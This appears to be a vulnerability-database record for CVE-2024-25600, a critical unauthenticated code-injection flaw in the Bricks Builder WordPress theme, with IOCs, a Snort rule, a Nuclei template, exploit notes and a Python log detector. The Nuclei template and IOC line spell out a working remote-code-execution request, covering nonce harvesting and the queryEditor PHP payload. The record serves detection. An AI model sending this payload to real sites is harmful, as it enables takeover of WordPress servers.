cbcvebase.
CVE-2024-25600
published 2024-06-04

Priority: P1 · 95 · critical · CVSS 3.1: 10
Vector: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Tags: ITW · EXPLOIT · VulnCheck KEV · Initial access
Exploited in the wild
EPSS: 87.45% (99.7th percentile)

Improper Control of Generation of Code ('Code Injection') vulnerability in Codeer Limited Bricks Builder allows Code Injection. This issue affects Bricks Builder: from n/a through 1.9.6.

Affected

1 range
Vendor          Product          Version range    Fixed in
codeer_limited  bricks_builder   n/a – 1.9.6

Detection & IOCs (extracted from sources)

url: /wp-json/bricks/v1/render_element
path: /wp-content/themes/bricks/
command: ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);
snort:
alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET EXPLOIT CVE-2024-25600 Bricks Exploitation Attempt"; flow:established,to_server; http.request_line; content:"POST|20 2f|wp|2d|json|2f|bricks|2f|v1|2f|render|5f|element|20|"; fast_pattern; http.request_body; content:"postId"; content:"nonce"; content:"useQueryEditor"; content:"queryEditor"; reference:url,github.com/Chocapikk/CVE-2024-25600/; reference:cve,2024-25600; classtype:misc-attack; sid:2051020; rev:2; metadata:affected_product Wordpress_Plugins, attack_target Client_Endpoint, tls_state TLSEncrypt, created_at 2024_02_21, cve CVE_2024_25600, deployment Perimeter, deployment SSLDecrypt, confidence Medium, signature_severity Major, tag Wordpress, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_02_22, reviewed_at 2024_11_06;)
nuclei template (labelled "yara" in the source extraction, but the content is a Nuclei HTTP template):
id: CVE-2024-25600
http:
- raw:
  - |
    GET / HTTP/1.1
    Host: {{Hostname}}
  - |
    POST /wp-json/bricks/v1/render_element HTTP/1.1
    Host: {{Hostname}}
    Content-Type: application/json
    {"postId": "1","nonce": "{{nonce}}","element": {"name": "container","settings": {"hasLoop": "true","query": {"useQueryEditor": true,"queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);","objectType": "post"}}}}
  matchers:
  - type: regex
    regex:
    - "Exception:"
    - "uid=([0-9(a-z-)]+) gid=([0-9(a-z-)]+) groups=([0-9(a-z-)]+)"
• The exploit is a two-step process: first retrieve the nonce from the JSON block on the homepage (var bricksData), then POST to /wp-json/bricks/v1/render_element with that nonce and a malicious queryEditor payload.
• The payload is delivered as a JSON POST body containing the fields postId, nonce, element.name, element.settings.hasLoop, element.settings.query.useQueryEditor and element.settings.query.queryEditor. Detection should require all four body keywords (postId, nonce, useQueryEditor, queryEditor) together.
• Post-exploitation activity includes disabling security plugins such as Wordfence and Sucuri; monitor for unexpected deactivation of these plugins after a suspected exploitation attempt.
• The Nuclei template extracts the nonce from the homepage body with the regex 'nonce":"([0-9a-z]+)'; use this pattern to identify nonce-harvesting reconnaissance. Note that the regex matches the response body, not the request, so in request logs the reconnaissance step shows up as a homepage GET shortly before a POST to the render_element endpoint from the same source.
• The Snort/ET rule requires TLS decryption (SSLDecrypt deployment) to inspect the POST body, as the exploit typically arrives over HTTPS.
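The detection notes above can be applied to request logs directly. The following is an added example, not part of the cbcvebase record, the ET rule or the Nuclei template: it replays the Snort rule's condition (POST to the render_element endpoint whose body carries postId, nonce, useQueryEditor and queryEditor together) over a constructed JSON-lines log, and correlates each hit with a preceding homepage GET from the same source, which is how the nonce-harvesting step of the two-step exploit appears in request logs. The log format, the field names (ts, src, method, path, body), the ten-minute correlation window and the sample records are assumptions; the queryEditor value is a placeholder rather than a payload.

```python
import json
from datetime import datetime, timedelta

# Endpoint and the four body keywords the ET/Snort rule for CVE-2024-25600
# requires to appear together in one POST body.
RENDER_ENDPOINT = "/wp-json/bricks/v1/render_element"
BODY_KEYWORDS = ("postId", "nonce", "useQueryEditor", "queryEditor")
# How far back to look for the homepage GET that harvested the nonce (assumed window).
RECON_WINDOW = timedelta(minutes=10)


def _body(**fields):
    return json.dumps(fields)


# Constructed sample log: JSON lines from a hypothetical reverse proxy or WAF that
# records request bodies (plain access logs do not, and TLS must be terminated in
# front of the logger). Field names are assumptions, not a real product's schema.
SAMPLE_RECORDS = [
    {"ts": "2024-02-20T10:00:01Z", "src": "203.0.113.7", "method": "GET", "path": "/", "body": ""},
    {"ts": "2024-02-20T10:00:03Z", "src": "203.0.113.7", "method": "POST", "path": RENDER_ENDPOINT,
     "body": _body(postId="1", nonce="0123456789",
                   element={"name": "container", "settings": {"hasLoop": "true", "query": {
                       "useQueryEditor": True, "queryEditor": "<placeholder>", "objectType": "post"}}})},
    # Editor-style request without the query editor keys: must not alert.
    {"ts": "2024-02-20T10:05:00Z", "src": "198.51.100.4", "method": "POST", "path": RENDER_ENDPOINT,
     "body": _body(postId="7", nonce="abcdef0123", element={"name": "container", "settings": {}})},
    # Full keyword set but no preceding homepage fetch from this source.
    {"ts": "2024-02-20T10:06:00Z", "src": "192.0.2.9", "method": "POST", "path": RENDER_ENDPOINT + "?x=1",
     "body": _body(postId="1", nonce="fedcba9876",
                   element={"settings": {"query": {"useQueryEditor": True, "queryEditor": "<placeholder>"}}})},
    {"ts": "2024-02-20T10:07:00Z", "src": "192.0.2.9", "method": "GET",
     "path": "/wp-content/themes/bricks/style.css", "body": ""},
]
SAMPLE_LOG = "\n".join(json.dumps(r) for r in SAMPLE_RECORDS) + "\n"


def parse_log(text):
    """Parse JSON-lines records, skipping blank lines."""
    return [json.loads(line) for line in text.splitlines() if line.strip()]


def _path_only(path):
    """Drop any query string so the endpoint compares exactly."""
    return path.split("?", 1)[0]


def _parse_ts(ts):
    return datetime.fromisoformat(ts.replace("Z", "+00:00"))


def is_render_element_exploit(rec):
    """Same condition as the ET rule: a POST to the render_element endpoint whose
    body carries postId, nonce, useQueryEditor and queryEditor together."""
    if rec["method"] != "POST" or _path_only(rec["path"]) != RENDER_ENDPOINT:
        return False
    body = rec.get("body") or ""
    return all(keyword in body for keyword in BODY_KEYWORDS)


def find_exploit_attempts(records):
    """Return one alert per matching POST, flagging whether the same source
    fetched the homepage (the nonce-harvesting step) within RECON_WINDOW."""
    last_homepage_get = {}  # src -> datetime of that source's most recent GET /
    alerts = []
    for rec in sorted(records, key=lambda r: r["ts"]):
        ts = _parse_ts(rec["ts"])
        if rec["method"] == "GET" and _path_only(rec["path"]) == "/":
            last_homepage_get[rec["src"]] = ts
            continue
        if is_render_element_exploit(rec):
            prior = last_homepage_get.get(rec["src"])
            alerts.append({
                "ts": rec["ts"],
                "src": rec["src"],
                "nonce_recon_seen": prior is not None and ts - prior <= RECON_WINDOW,
            })
    return alerts


if __name__ == "__main__":
    for alert in find_exploit_attempts(parse_log(SAMPLE_LOG)):
        print(alert)
```

On the sample log this yields two alerts: the 203.0.113.7 POST with nonce_recon_seen set, because that source fetched the homepage two seconds earlier, and the 192.0.2.9 POST without it; the 198.51.100.4 request lacks the query editor keys and is ignored. The ET rule's own metadata marks its confidence Medium, so treat a keyword hit as a triage lead rather than a verdict: the recon flag and the session's authentication state are what separate an unauthenticated two-step attempt from a logged-in editor session posting the same keys.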

CVSS provenance

nvd: v3.1 10.0 CRITICAL CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
vulncheck: 10.0 CRITICAL